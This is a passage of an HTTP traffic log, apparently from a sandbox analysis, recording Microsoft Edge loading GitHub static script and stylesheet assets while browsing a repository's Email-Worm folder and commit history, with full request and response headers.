accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 11 Mar 2025 18:04:48 GMT
etag: "0x8DD60C7363A6437"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:50 GMT
age: 19724
x-served-by: cache-iad-kiad7000058-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 38, 112
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 095a10de285d4dcaeadc1fc5d5d9015a4144b746
content-length: 68515
GET

https://github.githubassets.com/assets/commits.ec4e44e924b297faabce.module.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/commits.ec4e44e924b297faabce.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Thu, 06 Mar 2025 22:30:43 GMT
etag: "0x8DD5CFE882ABEA2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 440244
x-served-by: cache-iad-kjyo7100165-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 26, 276
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f6294ef9421d71c8f69214e57376a00ef4479556
content-length: 7543
GET

https://github.githubassets.com/assets/vendors-node_modules_date-fns_format_mjs-6e4d0f904632.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_date-fns_format_mjs-6e4d0f904632.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 09 Dec 2024 13:29:43 GMT
etag: "0x8DD18558A8F0790"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 4912649
x-served-by: cache-iad-kjyo7100108-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 44, 3492
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 604d1ba2bbc1dd7eef71aad66b31a7f9885aed2a
content-length: 5731
GET

https://github.githubassets.com/assets/vendors-node_modules_date-fns_addWeeks_mjs-node_modules_date-fns_addYears_mjs-node_modules_da-827f4f-cf37cd06c24f.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_date-fns_addWeeks_mjs-node_modules_date-fns_addYears_mjs-node_modules_da-827f4f-cf37cd06c24f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 16 Sep 2024 23:19:53 GMT
etag: "0x8DCD6A6120A4187"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 2398325
x-served-by: cache-iad-kcgs7200100-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 4152, 3501
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ba3f8d26c8858a3cd9db1d68dc6ccb443a175c14
content-length: 4976
GET

https://github.githubassets.com/assets/vendors-node_modules_react-relay_index_js-3e4c69718bad.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_react-relay_index_js-3e4c69718bad.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:21:00 GMT
etag: "0x8DD4BAB260C35F6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 2199530
x-served-by: cache-iad-kcgs7200077-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 35, 5193
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: dbea1292f48e7bc9c9b93e352b089bba358b434c
content-length: 58677
GET

https://github.githubassets.com/assets/vendors-node_modules_focus-visible_dist_focus-visible_js-node_modules_fzy_js_index_js-node_mo-39e45c-b30cde6f79f8.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_focus-visible_dist_focus-visible_js-node_modules_fzy_js_index_js-node_mo-39e45c-b30cde6f79f8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 04 Mar 2025 19:12:46 GMT
etag: "0x8DD5B508C4CD8C8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 565888
x-served-by: cache-iad-kiad7000031-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 10, 2450
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 51815f8aeae002e07e59b92f2447ac9c142872cd
content-length: 4163
GET

https://github.githubassets.com/assets/vendors-node_modules_github_hotkey_dist_index_js-node_modules_date-fns_getDaysInMonth_mjs-nod-70c11b-75afe0f5c344.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_hotkey_dist_index_js-node_modules_date-fns_getDaysInMonth_mjs-nod-70c11b-75afe0f5c344.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Sun, 02 Feb 2025 15:18:35 GMT
etag: "0x8DD439CDCB6ABC7"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 3119819
x-served-by: cache-iad-kiad7000024-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 79, 3539
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d33898122e3bf5ca643c99632cf53648a8944847
content-length: 3779
GET

https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-cff384-b7d3c96e5f18.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_g-emoji-element_di-cff384-b7d3c96e5f18.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 21 Jan 2025 21:23:16 GMT
etag: "0x8DD3A61D2298B26"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 4190596
x-served-by: cache-iad-kiad7000168-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 16, 3537
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7c8e92dd9b0ae401ad722f573404abba73480485
content-length: 6026
GET

https://github.githubassets.com/assets/vendors-node_modules_react-relay_hooks_js-node_modules_color2k_dist_index_exports_import_es_m-05025c-dd04247c9c77.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_react-relay_hooks_js-node_modules_color2k_dist_index_exports_import_es_m-05025c-dd04247c9c77.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 21 Jan 2025 21:23:17 GMT
etag: "0x8DD3A61D24C3765"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 4190596
x-served-by: cache-iad-kcgs7200145-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 6563, 3501
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 376cb258ae8b91bee133acbbc3e875411dd197af
content-length: 3524
GET

https://github.githubassets.com/assets/vendors-node_modules_tanstack_react-query_build_modern_useMutation_js-node_modules_tanstack_r-8c7f45-61a93e5806f6.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_tanstack_react-query_build_modern_useMutation_js-node_modules_tanstack_r-8c7f45-61a93e5806f6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 18 Feb 2025 23:27:01 GMT
etag: "0x8DD5073BEEE8583"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 1504106
x-served-by: cache-iad-kcgs7200125-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 4, 86
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 11e6f804c75b1276e89cf6f92be7bb2708b87164
content-length: 3158
GET

https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_hydro-analytics-f409df-2c9bc8e4459c.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_hydro-analytics-f409df-2c9bc8e4459c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 04 Mar 2025 19:12:47 GMT
etag: "0x8DD5B508C8CF50A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 565699
x-served-by: cache-iad-kiad7000129-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 5, 197
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 162a02b615454c4ecf06d415b0362bee060ccde0
content-length: 4134
GET

https://github.githubassets.com/assets/ui_packages_list-view_src_ListItem_ListItem_tsx-ui_packages_list-view_src_ListItem_Title_tsx--68e5b9-4bb2727ac420.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_list-view_src_ListItem_ListItem_tsx-ui_packages_list-view_src_ListItem_Title_tsx--68e5b9-4bb2727ac420.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 07 Mar 2025 18:40:02 GMT
etag: "0x8DD5DA77892387E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 261279
x-served-by: cache-iad-kiad7000124-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 120, 1944
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: da9544b16080399b3eea855fa4861ad56b870a1e
content-length: 9259
GET

https://github.githubassets.com/assets/ui_packages_date-picker_date-picker_ts-ui_packages_github-avatar_GitHubAvatar_tsx-df9548397fca.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_date-picker_date-picker_ts-ui_packages_github-avatar_GitHubAvatar_tsx-df9548397fca.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 11 Mar 2025 20:19:28 GMT
etag: "0x8DD60DA0692C79D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 11981
x-served-by: cache-iad-kiad7000069-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 26, 28
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: bd316e2d4d7e6dcd5c8b1960023b7f20d0d3a167
content-length: 7951
GET

https://github.githubassets.com/assets/ui_packages_item-picker_constants_labels_ts-ui_packages_item-picker_constants_values_ts-ui_pa-163a9a-f372d973c79c.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_item-picker_constants_labels_ts-ui_packages_item-picker_constants_values_ts-ui_pa-163a9a-f372d973c79c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:58 GMT
etag: "0x8DD4BAB24D97B2A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 2199523
x-served-by: cache-iad-kiad7000171-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 22, 199
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: aada1d4d379e3a5fd52c9417c02ba3b4856afe8d
content-length: 11071
GET

https://github.githubassets.com/assets/ui_packages_item-picker_components_RepositoryPicker_tsx-3840f58896cc.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_item-picker_components_RepositoryPicker_tsx-3840f58896cc.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 26 Feb 2025 05:53:01 GMT
etag: "0x8DD5629D44BE616"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 382829
x-served-by: cache-iad-kjyo7100063-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 25, 2070
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 385d4497ea372fe8f802b79fdac386e7a92c38d5
content-length: 3942
GET

https://github.githubassets.com/assets/ui_packages_comment-box_api_file-upload_ts-ui_packages_comment-box_api_preview_ts-ui_packages-bc8aaa-9c22832d922e.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_comment-box_api_file-upload_ts-ui_packages_comment-box_api_preview_ts-ui_packages-bc8aaa-9c22832d922e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 07 Mar 2025 07:58:03 GMT
etag: "0x8DD5D4DC9BEFF89"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 353208
x-served-by: cache-iad-kcgs7200097-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 39, 1426
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4cd7d4a79dd09cb4b4cb68ab7b9a218d02a61414
content-length: 16929
GET

https://github.githubassets.com/assets/ui_packages_issue-create_dialog_CreateIssueDialogEntry_tsx-f3c8852f25fb.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_issue-create_dialog_CreateIssueDialogEntry_tsx-f3c8852f25fb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Sat, 08 Mar 2025 02:49:03 GMT
etag: "0x8DD5DEBC99B5161"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 261264
x-served-by: cache-iad-kcgs7200149-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 73, 1261
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 53fe0d7afc23db32b844f56ec84a73162f7ef707
content-length: 76758
GET

https://github.githubassets.com/assets/ui_packages_signed-commit-badge_index_ts-ui_packages_use-navigate_use-navigate_ts-7d3b385f92f0.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_signed-commit-badge_index_ts-ui_packages_use-navigate_use-navigate_ts-7d3b385f92f0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 28 Feb 2025 17:46:55 GMT
etag: "0x8DD581FE473393B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 719641
x-served-by: cache-iad-kiad7000053-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 59, 3098
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 951da0c4130f51cbbae70a8dd65ee7f28ce7aff1
content-length: 5849
GET

https://github.githubassets.com/assets/commits-be407469628b.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/commits-be407469628b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 11 Mar 2025 18:04:44 GMT
